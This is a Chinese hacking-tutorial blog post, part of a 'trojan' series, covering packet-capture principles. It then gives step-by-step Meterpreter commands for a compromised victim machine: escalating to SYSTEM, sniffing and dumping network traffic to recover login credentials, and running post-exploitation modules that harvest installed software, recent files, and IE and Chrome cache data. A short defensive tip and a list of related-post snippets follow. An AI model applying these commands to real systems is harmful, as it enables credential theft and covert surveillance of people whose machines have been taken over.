声明:禁止用作非法目的,谢绝一切形式的转载。

当你在登陆某个网站的时候,当你在用ftp登陆传输文件的时候,你的密码可能已经被嗅探到了。黑客利用网络嗅探可以获取大量有用的信息。

文章目录

  • 预备条件
  • 网络抓包
    • 代理服务器
      • 代理服务器
      • 抓包原理
    • 网卡
      • 网卡
      • Wireshark协议分析器原理
    • meterpreter网络嗅探
  • meterpreter获取敏感数据
  • 写在最后
  • 公众号

预备条件

  1. 生成木马,可参考这里
  2. 获取meterpreter,可参考这里

网络抓包

抓取数据包通常有两种方式,一种时基于代理服务器的,像Burpsuit、Fiddler等,另一种就是基于网卡,最著名的就是Wireshark。这里主要指的是抓取web的数据流。

代理服务器

代理服务器

代理服务器英文全称是(Proxy Server),其功能就是代理网络用户去取得网络信息。形象的说:它是网络信息的中转站。代理服务器就好象一个大的Cache,这样就能显著提高浏览速度和效率。更重要的是:Proxy Server(代理服务器)是Internet链路级网关所提供的一种重要的安全功能

抓包原理

下图展示了数据流的走向,很明显,这就是大名鼎鼎的"中间人攻击",所有的数据流都要走代理服务器,因此代理服务器能截获所有的数据流。Burpsuit以及Fiddler等都是基于这种原理。

浏览器代理服务器真正服务器ssl client hello代理服务器的证书(C1)ssl client hello真正服务器的证书(C2)浏览器代理服务器真正服务器

网卡

网卡

网卡(NIC)是局域网(LAN,全称是:Local Area NetWork)中连接计算机和传输介质的接口,它工作在物理层(L1)。它是处于主机箱内的一块网络接口板,因为它的存在,从而使得本机能够与外部局域网进行连接通信。任何一台计算机,想要进行上网、通信功能,就必须使用网卡。

Wireshark协议分析器原理

网络上传输的数据包通过网卡进入到网络协议分析器系统。协议分析器所使用的网卡和网卡 驱动程序必须能够支持“混杂模式操作(Promiscuous Mode Operation)”。因为只有运行在混杂模式下的网卡才能够捕获到网络中传输到其他设备的“广播数据包、多播数据包、单播数据包以及错误数据包等等”,两者一起协同工作。分析器原理图如下:

meterpreter网络嗅探

  1. 加载嗅探模块 use sniffer
  2. 提升权限到System getsystem
  3. 列出"肉鸡"所有开放的网络接口 sniffer_interfaces
  4. 获取正在实施嗅探网络接口的统计数据 sniffer_start 3
  5. dump数据包 sniffer_dump 3 /tmp/test3.cap
  6. 用wireshark分析数据包,可以看到用户名密码都是burning

meterpreter获取敏感数据

run post/windows/gather/checkvm #是否虚拟机

run post/windows/gather/enum_applications #获取安装软件信息

run post/windows/gather/dumplinks #获取最近的文件操作

run post/windows/gather/enum_ie #获取IE缓存

run post/windows/gather/enum_chrome #获取Chrome缓存

写在最后

尽量不要使用表单进行登陆,这个可以考虑使用div等来进行替换。对于密码传输,明文是不应该出出现的,因此像FTP这样的工具应该谨慎使用。

公众号

更多网络安全,欢迎关注我的公众号:无情剑客。

黑客攻击-木马程序(3)相关推荐

  1. 黑客攻击-木马程序(1)

    声明:禁止用作非法目的,谢绝一切形式的转载. 当你在无意间点击一个链接后,当你在不明情况安装一个程序时,当你忍不住点击一个美女图片的时候,你的设备可能就此沦陷了,成为了黑客眼中的"肉鸡&qu ...

  2. 黑客攻击-木马程序(2)

    声明:本篇内容禁止用作非法目的,谢绝一切形式的转载 当你在登陆电脑的时候,当你在登陆淘宝的时候,当你在登陆微信的时候,你的输入可能正在被记录,然后电脑的登陆密码.微信帐号密码.淘宝的帐号密码就这样在不 ...

  3. 探秘网络背后黑产链:黑客攻击木马病毒机构内鬼防不胜防

    电子商务.移动支付的普及,消费者越来越少随身携带现金,人们打趣道"小偷都快失业了". 但在互联网上,靠盗窃用户电子账户资金.虚拟资产的"网络小偷"却十分猖獗. ...

  4. 黑客攻击-木马免杀之PE文件

    当你好不容易弄出来一个木马(具体可参考这里)的时候,却被杀毒软件轻易的就检测出来了,那一切岂不是白费了.Win10中的windows defender基于流量检测很容易把常见的木马程序检测出来,那怎么 ...

  5. 警方通报西北工业大学遭境外黑客攻击,敲响网络安全警钟

    警方通报西北工业大学遭境外黑客攻击,敲响网络安全警钟 西北工业大学电子邮件系统近期发现一批以科研评审.答辩邀请和出国通知等为主题的钓鱼邮件,内含木马程序,引诱部分师生点击链接,非法获取师生电子邮箱登录 ...

  6. 八成网银存在安全隐患 360安全卫士拿“木马程序”开刀

    八成网银存在安全隐患 360安全卫士拿"木马程序"开刀 2006年,辽宁一男子通过工行网上银行盗窃42万多元后"人间蒸发":2006年9月,淘宝网一位卖家在短短 ...

  7. 移动银行木马活跃度升级 恐成黑客攻击跳板

    近日,亚信安全网络安全监测实验室在监测统计分析中发现,移动恶意软件呈现爆发趋势,银行木马威胁尤为严重,这与当下贪婪的不法分子追逐金钱实质利益息息相关.其中一种被命名为"Svpeng" ...

  8. python编写木马攻击_用Python写一个自动木马程序

    电脑作为大家日常办公的工具,最怕的一件事情之一就是被偷,当我们的电脑被盗的时候,不仅仅是电脑本身,更重要的是电脑存储的资料都会丢失.如何尽快的找回电脑需要我们想点办法,今天就教大家一个好的技巧,虽说不 ...

  9. 黑客攻防技术宝典Web实战篇第2版—第11章 攻击应用程序逻辑

    11.1 逻辑缺陷的本质 1.一般逻辑缺陷表现为设计者或者开发者在思考过程中做出的特殊假设存在明显或者隐含的错误. 11.2 现实中的逻辑缺陷 11.2.1 例1:征求提示 1.功能:如"记 ...

  10. python编写木马攻击_Python编写简易木马程序

    Python编写简易木马程序 0x00 准备 文章内容仅供学习研究.切勿用于非法用途! 这次我们使用Python编写一个具有键盘记录.截屏以及通信功能的简易木马.依然选用Sublime text2 + ...

最新文章

  1. FPGA之道(62)时空变换之空间换时间
  2. (转)datagridview 自定义列三步走
  3. GIS配准和配准算法基本概念学习
  4. Mysql数据库的瓶颈处理一点建议
  5. Spring 3.2 @ControllerAdvice批注的异常处理
  6. postgresql数据库安装及简单操作
  7. (31)SystemVerilog语言编写D触发器
  8. 查看sql_一键查看Oracle数据库当前SQL_WORKAREA_ACTIVE的相关操作
  9. html+css基础教程入门学习之CSS表格
  10. 隧道在线监测系统解决方案
  11. Unity曲面UI插件Curved UI
  12. kubernetes apiserver源码分析二之路由
  13. Unity中帧数FPS的显示查看
  14. 【人脸识别(三)】:使用face_recognition库实现人脸识别,python实现
  15. Python数据分析之Matplotlib-I
  16. 【文本挖掘】——词频统计、词云绘制与美化+[微微一笑很倾城]实战
  17. 2022年必读的10本经管好书
  18. iOS开发笔记之九十四——Swift中的可选类型Optional
  19. 博时基金数据开发面经
  20. 上海无居住证120积分随迁子女如何求学(中考)

热门文章

  1. Dart | 使用 Flutter 制作一个像 SIRI 那样的语音机器人
  2. java集合根据条件筛选数据
  3. 从电信的广告学习情景与文案的搭配
  4. 成年人的世界,不过如此
  5. 年底看机会,欢迎加入Java大数据招聘群!
  6. 计算机课程微教学设计,计算机基础知识教学设计
  7. HAU寒假训练第一周
  8. Springboot搭建文件服务器
  9. 第四章—密钥管理与分配
  10. asa清空配置_思科ASA基本配置